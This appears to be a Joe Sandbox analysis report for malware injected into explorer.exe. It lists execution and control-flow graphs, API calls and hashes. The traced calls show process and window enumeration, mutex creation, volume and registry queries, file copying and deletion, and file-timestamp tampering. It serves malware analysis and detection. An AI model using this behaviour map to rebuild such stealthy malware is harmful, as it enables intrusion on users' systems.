                                                                                                                            • Instruction Fuzzy Hash: 2DF0FCB18242449ADB119BA5DD807FE7B68E709330F51422EED0466240CB794EC59797

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:39.3%
                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                            Signature Coverage:3.1%
                                                                                                                            Total number of Nodes:229
                                                                                                                            Total number of Limit Nodes:21
                                                                                                                            execution_graph 2413 8821a10 2423 8821a60 2413->2423 2416 8821a3d 2417 8821a2b SleepEx 2417->2417 2418 8821a3b 2417->2418 2430 8822254 2418->2430 2425 8821a97 2423->2425 2424 8821a22 2424->2416 2424->2417 2425->2424 2426 8821b60 RtlCreateHeap 2425->2426 2427 8821b91 2426->2427 2427->2424 2428 8821d10 CreateThread 2427->2428 2429 8821d41 CreateThread 2428->2429 2450 8823c84 2428->2450 2429->2424 2447 8823d60 2429->2447 2431 8822272 2430->2431 2455 8824ad0 2431->2455 2433 8821a50 2434 8821e1c 2433->2434 2461 8824d20 2434->2461 2436 8821e57 2437 8821e88 CreateMutexExA 2436->2437 2438 8821ea2 2437->2438 2465 8824e90 2438->2465 2440 8821ee1 2469 8821f94 2440->2469 2445 8821f4e 2474 88222fc 2445->2474 2480 8822d60 2445->2480 2448 8823d72 EnumWindows SleepEx 2447->2448 2449 8823d96 2447->2449 2448->2448 2448->2449 2451 8823ca1 CreateToolhelp32Snapshot 2450->2451 2452 8823d3b 2450->2452 2453 8823d23 SleepEx 2451->2453 2454 8823cb5 2451->2454 2453->2451 2453->2452 2454->2453 2456 8824af9 2455->2456 2457 8824b0d GetTokenInformation 2456->2457 2460 8824b6a 2456->2460 2458 8824b38 2457->2458 2459 8824b42 GetTokenInformation 2458->2459 2459->2460 2460->2433 2462 8824d4d GetVolumeInformationA 2461->2462 2464 8824da0 2462->2464 2464->2436 2466 8824eb2 2465->2466 2467 8824ef3 RegQueryValueExA 2466->2467 2468 8824f46 2466->2468 2467->2466 2468->2440 2473 8821fb7 2469->2473 2470 8821f0d CreateFileMappingA 2470->2445 2472 88220eb CreateFileW 2472->2470 2473->2470 2483 8823520 2473->2483 2475 882232d 2474->2475 2489 882337c CreateFileW 2475->2489 2477 8822342 2491 882239c 2477->2491 2479 8822353 2479->2445 2481 882337c CreateFileW 2480->2481 2482 8822d83 2481->2482 2482->2445 2484 8823541 2483->2484 2487 8823678 CoCreateInstance 2484->2487 2486 882359d 2486->2472 2488 88236d6 2487->2488 2488->2486 2490 88233d1 2489->2490 2490->2477 2496 88223ef 2491->2496 2492 88226fc DeleteFileW DeleteFileW 2493 882271e 2492->2493 2494 8822765 SleepEx RtlExitUserThread 2493->2494 2495 8822789 2494->2495 2495->2479 2496->2492 2496->2495 2497 b21a10 2507 b21a60 2497->2507 2500 b21a3d 2501 b21a2b SleepEx 2501->2501 2502 b21a3b 2501->2502 2513 b22254 2502->2513 2509 b21a97 2507->2509 2508 b21a22 2508->2500 2508->2501 2509->2508 2510 b21b60 RtlCreateHeap 2509->2510 2511 b21b91 2510->2511 2511->2508 2512 b21d10 CreateThread CloseHandle CreateThread CloseHandle 2511->2512 2512->2508 2530 b23d60 2512->2530 2533 b23c84 2512->2533 2514 b22272 2513->2514 2541 b24ad0 2514->2541 2516 b21a50 2517 b21e1c 2516->2517 2547 b24d20 2517->2547 2519 b21e57 2520 b21e88 CreateMutexExA 2519->2520 2521 b21ea2 2520->2521 2551 b24e90 2521->2551 2523 b21ee1 2556 b21f94 2523->2556 2528 b21f4e 2568 b222fc 2528->2568 2574 b22d60 2528->2574 2531 b23d72 EnumWindows SleepEx 2530->2531 2532 b23d96 2530->2532 2531->2531 2531->2532 2534 b23ca1 CreateToolhelp32Snapshot 2533->2534 2535 b23d3b 2533->2535 2536 b23d23 SleepEx 2534->2536 2537 b23cb5 Process32First 2534->2537 2536->2534 2536->2535 2539 b23ccd 2537->2539 2538 b23d1a CloseHandle 2538->2536 2539->2538 2540 b23d08 Process32Next 2539->2540 2540->2539 2542 b24af9 2541->2542 2543 b24b0d GetTokenInformation 2542->2543 2546 b24b6a 2542->2546 2544 b24b38 2543->2544 2545 b24b42 GetTokenInformation 2544->2545 2545->2546 2546->2516 2548 b24d4d GetVolumeInformationA 2547->2548 2550 b24da0 2548->2550 2550->2519 2554 b24eb2 2551->2554 2552 b24f6e ObtainUserAgentString 2552->2523 2553 b24ef3 RegQueryValueExA 2553->2554 2554->2553 2555 b24f46 2554->2555 2555->2552 2557 b21fb7 2556->2557 2558 b21f0d CreateFileMappingA 2557->2558 2559 b220ce 2557->2559 2560 b2201b DeleteFileW CopyFileW 2557->2560 2558->2528 2577 b23520 2559->2577 2560->2558 2561 b2203b DeleteFileW 2560->2561 2564 b22051 2561->2564 2563 b220eb CreateFileW 2563->2558 2565 b22086 DeleteFileW 2564->2565 2566 b2209a 2565->2566 2583 b249b0 2566->2583 2569 b2232d 2568->2569 2590 b2337c CreateFileW 2569->2590 2571 b22342 2592 b2239c 2571->2592 2573 b22353 2573->2528 2575 b2337c CreateFileW 2574->2575 2576 b22d83 2575->2576 2576->2528 2578 b23541 2577->2578 2579 b23561 GetUserNameW 2578->2579 2580 b23582 2579->2580 2588 b23678 CoCreateInstance 2580->2588 2582 b2359d 2582->2563 2584 b249d7 2583->2584 2585 b249f7 SetFileAttributesW CreateFileW 2584->2585 2586 b24a42 SetFileTime 2585->2586 2587 b24a63 2586->2587 2587->2559 2589 b236d6 2588->2589 2589->2582 2591 b233d1 2590->2591 2591->2571 2616 b23e70 2592->2616 2594 b22648 2597 b226e7 2594->2597 2598 b22789 2594->2598 2611 b22660 2594->2611 2595 b2282d 2596 b23e70 RtlReAllocateHeap 2595->2596 2602 b22854 2596->2602 2599 b226fc DeleteFileW DeleteFileW 2597->2599 2606 b227ec 2597->2606 2600 b23e70 RtlReAllocateHeap 2598->2600 2601 b2271e 2599->2601 2605 b227b0 2600->2605 2604 b23e70 RtlReAllocateHeap 2601->2604 2603 b228d0 RtlReAllocateHeap 2602->2603 2602->2606 2603->2606 2607 b22748 2604->2607 2605->2606 2608 b228d0 RtlReAllocateHeap 2605->2608 2606->2573 2610 b22765 SleepEx RtlExitUserThread 2607->2610 2608->2606 2609 b23e70 RtlReAllocateHeap 2609->2611 2610->2606 2611->2597 2611->2606 2611->2609 2620 b228d0 2611->2620 2613 b223ef 2613->2606 2614 b249b0 3 API calls 2613->2614 2615 b22624 2613->2615 2614->2615 2615->2594 2615->2595 2617 b23e9f 2616->2617 2626 b2400c 2617->2626 2619 b23fbf 2619->2613 2621 b228d9 2620->2621 2623 b22cf3 2620->2623 2622 b2400c RtlReAllocateHeap 2621->2622 2625 b229d8 2621->2625 2622->2625 2623->2611 2624 b23e70 RtlReAllocateHeap 2624->2623 2625->2623 2625->2624 2628 b24056 2626->2628 2629 b2404f 2626->2629 2627 b2433f RtlReAllocateHeap 2627->2628 2628->2627 2628->2629 2629->2619 2630 b21971 2631 b21972 2630->2631 2632 b219ea 2631->2632 2633 b219fb 2631->2633 2636 b21a10 36 API calls 2632->2636 2634 b21a03 2633->2634 2637 b21a10 2633->2637 2636->2634 2638 b21a60 12 API calls 2637->2638 2639 b21a22 2638->2639 2640 b21a3d 2639->2640 2641 b21a2b SleepEx 2639->2641 2640->2634 2641->2641 2642 b21a3b 2641->2642 2643 b22254 2 API calls 2642->2643 2644 b21a50 2643->2644 2645 b21e1c 21 API calls 2644->2645 2646 b21a58 2645->2646 2647 b217fb 2648 b21827 2647->2648 2649 b21901 2648->2649 2650 b219ea 2648->2650 2651 b219fb 2648->2651 2654 b21a10 36 API calls 2650->2654 2652 b21a03 2651->2652 2653 b21a10 36 API calls 2651->2653 2653->2652 2654->2652 2689 88217fb 2690 8821827 2689->2690 2691 8821901 2690->2691 2692 8821a10 21 API calls 2690->2692 2692->2691 2655 b219b8 2656 b21952 2655->2656 2657 b219c9 2655->2657 2658 b219ea 2657->2658 2659 b219fb 2657->2659 2662 b21a10 36 API calls 2658->2662 2660 b21a03 2659->2660 2661 b21a10 36 API calls 2659->2661 2661->2660 2662->2660 2693 88219b8 2694 8821952 2693->2694 2695 88219c9 2693->2695 2696 8821a10 21 API calls 2695->2696 2697 8821a03 2696->2697 2671 882192c 2672 882193a 2671->2672 2673 8821944 2672->2673 2675 8821a10 2672->2675 2676 8821a60 7 API calls 2675->2676 2677 8821a22 2676->2677 2678 8821a3d 2677->2678 2679 8821a2b SleepEx 2677->2679 2678->2673 2679->2679 2680 8821a3b 2679->2680 2681 8822254 2 API calls 2680->2681 2682 8821a50 2681->2682 2683 8821e1c 11 API calls 2682->2683 2684 8821a58 2683->2684
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2692065809.0000000000B21000.00000020.80000000.00040000.00000000.sdmp, Offset: 00B21000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_b21000_explorer.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateInstance
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 542301482-0
                                                                                                                            • Opcode ID: b35aeaa2dabb4e76190c9dece0e8e20c87b044d0080395537af34a5cdc12a271
                                                                                                                            • Instruction ID: 4018062e5a983522a858bb4134ecd936311b7199a25fa125ef29309ba6c459f7
                                                                                                                            • Opcode Fuzzy Hash: b35aeaa2dabb4e76190c9dece0e8e20c87b044d0080395537af34a5cdc12a271
                                                                                                                            • Instruction Fuzzy Hash: 08E1E934608A4C8FCF94EF28C895EA9B7F1FFA9305F114699E44ACB265DB70E944CB41
                                                                                                                            APIs
                                                                                                                            • GetUserNameW.ADVAPI32 ref: 00B23574
                                                                                                                              • Part of subcall function 00B23678: CoCreateInstance.COMBASE ref: 00B236C5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2692065809.0000000000B21000.00000020.80000000.00040000.00000000.sdmp, Offset: 00B21000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_b21000_explorer.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateInstanceNameUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3213660374-0
                                                                                                                            • Opcode ID: fd6447a474a0c6c4e583e87f53b4852dd761150ae4ae7b776ee82d00e2f1a7d0
                                                                                                                            • Instruction ID: af7a69eb62090b88b61456b858c68cdd78ef8dad82a0307186c22ca2afb2ee78
                                                                                                                            • Opcode Fuzzy Hash: fd6447a474a0c6c4e583e87f53b4852dd761150ae4ae7b776ee82d00e2f1a7d0
                                                                                                                            • Instruction Fuzzy Hash: 26110A30718F5C4FCBA0EF68A01976EB6D2EBDC350F500A6EA84EC3259DA7889448781

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2692065809.0000000000B21000.00000020.80000000.00040000.00000000.sdmp, Offset: 00B21000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_b21000_explorer.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Create$CloseHandleThread$Heap
                                                                                                                            • String ID: iP+
                                                                                                                            • API String ID: 1490796931-51890417
                                                                                                                            • Opcode ID: 2cb0cc4895ba9d61a021ba4609a68b07abc7c0267e95d8eab074489c4e5da047
                                                                                                                            • Instruction ID: 5b4a786da1c01d2ba8be881da8507ea6a7cbae126309c19e96601c00bc9f3c5d
                                                                                                                            • Opcode Fuzzy Hash: 2cb0cc4895ba9d61a021ba4609a68b07abc7c0267e95d8eab074489c4e5da047
                                                                                                                            • Instruction Fuzzy Hash: A791C530618E58CFCF54EF2CE8966A573E6FBA8300B4405BD9C4ECB156EA34D941CB96

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 162 882239c-88223f9 call 8823e70 165 88228a7 162->165 166 88223ff-8822404 162->166 167 88228ad-88228c7 165->167 166->165 168 882240a-882240d 166->168 168->165 169 8822413-882241e 168->169 170 8822897-88228a5 call 88253d8 169->170 171 8822424-8822457 call 8825058 169->171 170->165 170->167 171->170 177 882245d-8822482 call 8824fac call 882516c 171->177 182 8822484-882249e 177->182 183 88224ad 177->183 182->183 188 88224a0-88224ab 182->188 184 88224b2-88224cb call 882516c 183->184 189 88224d1-88224e4 184->189 190 882263a-8822642 184->190 188->184 191 8822536-8822538 189->191 192 88224e6-882252d 189->192 193 8822648-882264c 190->193 194 882282d-882285a call 8823e70 190->194 191->190 198 882253e-88225b0 call 88253f8 191->198 192->191 196 8822652-882265a 193->196 197 88226f4-8822784 call 8824730 DeleteFileW * 2 call 88234d4 call 8823e70 call 88253d8 SleepEx RtlExitUserThread 193->197 206 882288f-8822895 194->206 207 882285c-8822863 194->207 201 8822660-882266d 196->201 202 8822789-88227b6 call 8823e70 196->202 197->170 241 88225b2-882262a call 8824fac call 8825058 call 88249b0 call 882535c 198->241 242 882262f-8822635 call 88253d8 198->242 201->206 218 8822673-8822676 201->218 202->206 216 88227bc-88227c3 202->216 206->170 207->206 212 8822865-8822868 207->212 212->206 217 882286a-882288a call 88228d0 call 88253d8 212->217 216->206 220 88227c9-88227cc 216->220 217->206 218->206 223 882267c-8822680 218->223 220->206 226 88227d2-882282b call 88228d0 call 8824730 call 88253d8 220->226 228 8822682-88226af call 8823e70 223->228 229 88226e7-88226ee 223->229 226->206 239 88226e1-88226e5 228->239 240 88226b1-88226b8 228->240 229->197 229->206 239->228 239->229 240->239 244 88226ba-88226bd 240->244 241->242 242->190 244->239 249 88226bf-88226dc call 88228d0 call 88253d8 244->249 249->239
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2697683211.0000000008821000.00000020.80000000.00040000.00000000.sdmp, Offset: 08821000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_8821000_explorer.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: DeleteFile$ExitSleepThreadUser
                                                                                                                            • String ID: |:|
                                                                                                                            • API String ID: 2796381497-3736120136
                                                                                                                            • Opcode ID: fbb803279be7c0de3d631b165653baee0dbf7d5d4714adb9b6c3d05972f478bd
                                                                                                                            • Instruction ID: 45ccb32d71aa093e0b3b1e243a779fa89d506a0a91c7e5c06e25b9d8302f7804
                                                                                                                            • Opcode Fuzzy Hash: fbb803279be7c0de3d631b165653baee0dbf7d5d4714adb9b6c3d05972f478bd
                                                                                                                            • Instruction Fuzzy Hash: 15E1A430718F58CFD769AB6C84586BAB6D1FB98312F10062ED49FC3240DF74E9828786

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 57 b2239c-b223f9 call b23e70 60 b228a7 57->60 61 b223ff-b22404 57->61 63 b228ad-b228c7 60->63 61->60 62 b2240a-b2240d 61->62 62->60 64 b22413-b2241e 62->64 65 b22897-b228a5 call b253d8 64->65 66 b22424-b22457 call b25058 64->66 65->60 65->63 66->65 72 b2245d-b22482 call b24fac call b2516c 66->72 77 b22484-b2249e 72->77 78 b224ad 72->78 77->78 82 b224a0-b224ab 77->82 79 b224b2-b224cb call b2516c 78->79 84 b224d1-b224e4 79->84 85 b2263a-b22642 79->85 82->79 88 b22536-b22538 84->88 89 b224e6-b2252d 84->89 86 b22648-b2264c 85->86 87 b2282d-b2285a call b23e70 85->87 91 b22652-b2265a 86->91 92 b226f4-b22784 call b24730 DeleteFileW * 2 call b234d4 call b23e70 call b253d8 SleepEx RtlExitUserThread 86->92 100 b2288f-b22895 87->100 101 b2285c-b22863 87->101 88->85 93 b2253e-b225b0 call b253f8 88->93 89->88 96 b22660-b2266d 91->96 97 b22789-b227b6 call b23e70 91->97 92->65 134 b225b2-b2262a call b24fac call b25058 call b249b0 call b2535c 93->134 135 b2262f-b22635 call b253d8 93->135 96->100 112 b22673-b22676 96->112 97->100 110 b227bc-b227c3 97->110 100->65 101->100 107 b22865-b22868 101->107 107->100 111 b2286a-b2288a call b228d0 call b253d8 107->111 110->100 115 b227c9-b227cc 110->115 111->100 112->100 118 b2267c-b22680 112->118 115->100 120 b227d2-b2282b call b228d0 call b24730 call b253d8 115->120 122 b22682-b226af call b23e70 118->122 123 b226e7-b226ee 118->123 120->100 137 b226e1-b226e5 122->137 138 b226b1-b226b8 122->138 123->92 123->100 134->135 135->85 137->122 137->123 138->137 141 b226ba-b226bd 138->141 141->137 146 b226bf-b226dc call b228d0 call b253d8 141->146 146->137
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2692065809.0000000000B21000.00000020.80000000.00040000.00000000.sdmp, Offset: 00B21000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_b21000_explorer.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: DeleteFile$ExitSleepThreadUser
                                                                                                                            • String ID: |:|
                                                                                                                            • API String ID: 2796381497-3736120136
                                                                                                                            • Opcode ID: fbb803279be7c0de3d631b165653baee0dbf7d5d4714adb9b6c3d05972f478bd
                                                                                                                            • Instruction ID: 761edc063c2ac33e6458655a982ae3c7546c6b494575a38f5208886e2dc6328d
                                                                                                                            • Opcode Fuzzy Hash: fbb803279be7c0de3d631b165653baee0dbf7d5d4714adb9b6c3d05972f478bd
                                                                                                                            • Instruction Fuzzy Hash: 97E1B230718F588BD729EB28A4597AA76D1FF98311F10066EE49FC3241DF74ED428786

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • DeleteFileW.KERNEL32 ref: 00B2201E
                                                                                                                            • CopyFileW.KERNEL32 ref: 00B2202D
                                                                                                                            • DeleteFileW.KERNEL32 ref: 00B2203E
                                                                                                                            • DeleteFileW.KERNEL32 ref: 00B22089
                                                                                                                              • Part of subcall function 00B249B0: SetFileAttributesW.KERNEL32 ref: 00B249FF
                                                                                                                              • Part of subcall function 00B249B0: CreateFileW.KERNEL32 ref: 00B24A29
                                                                                                                              • Part of subcall function 00B249B0: SetFileTime.KERNEL32 ref: 00B24A54
                                                                                                                            • CreateFileW.KERNEL32 ref: 00B22115
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2692065809.0000000000B21000.00000020.80000000.00040000.00000000.sdmp, Offset: 00B21000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_b21000_explorer.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: File$Delete$Create$AttributesCopyTime
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 642576546-0
                                                                                                                            • Opcode ID: 11cbd7d4e9e3daf7bdfec7693b32ce184b43af76b4895d117b786d6ffa4ff202
                                                                                                                            • Instruction ID: a393d2088402aa57d0fe6176a281b37e88012ae6975efce03910556005c30ed8
                                                                                                                            • Opcode Fuzzy Hash: 11cbd7d4e9e3daf7bdfec7693b32ce184b43af76b4895d117b786d6ffa4ff202
                                                                                                                            • Instruction Fuzzy Hash: E2414C30718A6C4FDBA8AF6CA45936E75D2EB8C311F5441AEA80EC3286DE749D068785

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 306 b23c84-b23c9b 307 b23ca1-b23cb3 CreateToolhelp32Snapshot 306->307 308 b23d3b-b23d54 306->308 309 b23d23-b23d35 SleepEx 307->309 310 b23cb5-b23ccb Process32First 307->310 309->307 309->308 311 b23d16-b23d18 310->311 312 b23d1a-b23d1d CloseHandle 311->312 313 b23ccd-b23ce4 call b25140 311->313 312->309 316 b23ce6-b23ce8 313->316 317 b23cea-b23cf8 316->317 318 b23cfc-b23d03 call b247a4 316->318 317->316 320 b23cfa 317->320 321 b23d08-b23d10 Process32Next 318->321 320->321 321->311
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2692065809.0000000000B21000.00000020.80000000.00040000.00000000.sdmp, Offset: 00B21000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_b21000_explorer.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2482764027-0
                                                                                                                            • Opcode ID: d87648c068091f5a601a251f696ac908138681014b07281b27555691989c57a1
                                                                                                                            • Instruction ID: f3b414dc9bbbf4e9a8de824f4f56e17cd616759a35289bc9eb571c91b3314cc6
                                                                                                                            • Opcode Fuzzy Hash: d87648c068091f5a601a251f696ac908138681014b07281b27555691989c57a1
                                                                                                                            • Instruction Fuzzy Hash: FE21E730118A088FDB14EF24D0887AA72D2FB88315F1807BAD84FDE155DB388A458711

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 322 8821a60-8821a95 323 8821a97-8821a9e 322->323 324 8821ab3-8821ab7 323->324 325 8821aa0-8821ab1 324->325 326 8821ab9-8821ac5 324->326 325->324 327 8821ac7-8821acd 326->327 328 8821adc-8821ae1 326->328 329 8821ae7-8821aee 327->329 330 8821acf-8821ada 327->330 328->329 331 8821af0-8821af7 329->331 332 8821af9-8821aff 329->332 330->329 331->332 333 8821b01-8821b0b 331->333 332->323 332->333 334 8821b1a-8821b32 call 8821d98 333->334 335 8821b0d-8821b14 333->335 336 8821d6f 334->336 340 8821b38-8821b5a call 8821d98 334->340 335->334 335->336 338 8821d71-8821d8f 336->338 340->336 343 8821b60-8821b8f RtlCreateHeap 340->343 344 8821b91-8821bab call 8824fac 343->344 344->336 348 8821bb1-8821bc9 call 882535c 344->348 348->344 351 8821bcb-8821be6 call 8821d98 348->351 351->336 354 8821bec-8821c0b call 8821d98 351->354 354->336 357 8821c11-8821c30 call 8821d98 354->357 357->336 360 8821c36-8821c55 call 8821d98 357->360 360->336 363 8821c5b-8821c7a call 8821d98 360->363 363->336 366 8821c80-8821c9f call 8821d98 363->366 366->336 369 8821ca5-8821d00 call 8824bac * 3 366->369 369->336 376 8821d02-8821d09 369->376 376->336 377 8821d0b-8821d0e 376->377 377->336 378 8821d10-8821d60 CreateThread * 2 377->378 380 8821d68-8821d6d 378->380 380->338
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2697683211.0000000008821000.00000020.80000000.00040000.00000000.sdmp, Offset: 08821000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_8821000_explorer.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Create$Thread$Heap
                                                                                                                            • String ID: iP+
                                                                                                                            • API String ID: 1054751041-51890417
                                                                                                                            • Opcode ID: 2cb0cc4895ba9d61a021ba4609a68b07abc7c0267e95d8eab074489c4e5da047
                                                                                                                            • Instruction ID: 2a25ab983d6a535afc02926892dd8fb46b40a455e71ec687941d3b7f6ba06eb2
                                                                                                                            • Opcode Fuzzy Hash: 2cb0cc4895ba9d61a021ba4609a68b07abc7c0267e95d8eab074489c4e5da047
                                                                                                                            • Instruction Fuzzy Hash: C591E334218E58CFCF14EF28D8956A573E6FB98302B14027DDC4ECB256EB30E5818B96

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2692065809.0000000000B21000.00000020.80000000.00040000.00000000.sdmp, Offset: 00B21000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_b21000_explorer.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: File$AttributesCreateTime
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1986686026-0
                                                                                                                            • Opcode ID: 608125a8aa1bce6175559d74748fb29477d2e5ca9ccfc86ce4b79151e6103723
                                                                                                                            • Instruction ID: 943f3ca3fad8f3ba0c9dd17ebc2d8807924b438ce3096240ec54e26d0005a8bf
                                                                                                                            • Opcode Fuzzy Hash: 608125a8aa1bce6175559d74748fb29477d2e5ca9ccfc86ce4b79151e6103723
                                                                                                                            • Instruction Fuzzy Hash: BC21FF3071CA488FDF64EF68988979EB6E2FBDC705F10456EA84EC7245DA34DA058782

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 390 b24e90-b24ed9 call b24fac 394 b24f63-b24f92 call b2535c ObtainUserAgentString 390->394 395 b24edf 390->395 397 b24ee1-b24f23 call b24fac RegQueryValueExA 395->397 401 b24f93 call b2535c 397->401 402 b24f25-b24f44 call b2535c call b2516c 397->402 405 b24f98-b24f9d 401->405 402->405 411 b24f46-b24f57 402->411 408 b24f59-b24f5a 405->408 409 b24f9f 405->409 408->394 409->397 411->408
                                                                                                                            APIs
                                                                                                                            • RegQueryValueExA.KERNEL32 ref: 00B24F15
                                                                                                                            • ObtainUserAgentString.URLMON ref: 00B24F7E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2692065809.0000000000B21000.00000020.80000000.00040000.00000000.sdmp, Offset: 00B21000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_b21000_explorer.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AgentObtainQueryStringUserValue
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4107646653-0
                                                                                                                            • Opcode ID: 1ee60c0f534f3764a8b7c02e3106e8c1bbbc8228cd7f8668cbf5d1b2e0d7aa71
                                                                                                                            • Instruction ID: f5dc9074a6e34ee2b7b063ccf3c544ab50d6ec9e93f1d363a930e859dfe77e1b
                                                                                                                            • Opcode Fuzzy Hash: 1ee60c0f534f3764a8b7c02e3106e8c1bbbc8228cd7f8668cbf5d1b2e0d7aa71
                                                                                                                            • Instruction Fuzzy Hash: A0318631608A5C8FDB18EF68E8896E977D5FB98314B0442BAE85EC3546EF7098058791

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 08824D20: GetVolumeInformationA.KERNEL32 ref: 08824D8D
                                                                                                                            • CreateMutexExA.KERNEL32 ref: 08821E8F
                                                                                                                            • CreateFileMappingA.KERNEL32 ref: 08821F41
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2697683211.0000000008821000.00000020.80000000.00040000.00000000.sdmp, Offset: 08821000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_8821000_explorer.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Create$FileInformationMappingMutexVolume
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3260430491-0
                                                                                                                            • Opcode ID: 9e9a34ea7cb298080777c61faf39ef342cf239ea35ae18d0dbcb535cd23d3ff0
                                                                                                                            • Instruction ID: fc5b78c680b8286d3274c8e00a07434fdd127a2e85cfd6d7b73776b31c48d4d8
                                                                                                                            • Opcode Fuzzy Hash: 9e9a34ea7cb298080777c61faf39ef342cf239ea35ae18d0dbcb535cd23d3ff0
                                                                                                                            • Instruction Fuzzy Hash: 3B418034714F2CCFEB64EB38805C7AAB2D2EF98317F104A2E805EC6644CF74A6429742

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 413 b21e1c-b21ea7 call b24d20 call b24fac call b2535c CreateMutexExA 422 b21ea9-b21eb6 413->422 423 b21ebe-b21f0f call b25440 call b253b8 call b24e90 call b25304 call b2535c call b21f94 413->423 422->423 437 b21f11 423->437 438 b21f1b-b21f48 CreateFileMappingA 423->438 437->438 439 b21f4e-b21f51 call b222fc 438->439 441 b21f56-b21f58 439->441 441->439 442 b21f5a-b21f61 441->442 443 b21f63-b21f6a 442->443 444 b21f74 442->444 443->444 445 b21f6c-b21f6f call b22d60 443->445 446 b21f79-b21f87 444->446 445->444 449 b21f89 446->449 449->439
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00B24D20: GetVolumeInformationA.KERNEL32 ref: 00B24D8D
                                                                                                                            • CreateMutexExA.KERNEL32 ref: 00B21E8F
                                                                                                                            • CreateFileMappingA.KERNEL32 ref: 00B21F41
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2692065809.0000000000B21000.00000020.80000000.00040000.00000000.sdmp, Offset: 00B21000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_b21000_explorer.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Create$FileInformationMappingMutexVolume
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3260430491-0
                                                                                                                            • Opcode ID: 9e9a34ea7cb298080777c61faf39ef342cf239ea35ae18d0dbcb535cd23d3ff0
                                                                                                                            • Instruction ID: a6c446e508715a6ab5dfafe036cd2927b31cf83d9f75a3c6b7f5db03512ac628
                                                                                                                            • Opcode Fuzzy Hash: 9e9a34ea7cb298080777c61faf39ef342cf239ea35ae18d0dbcb535cd23d3ff0
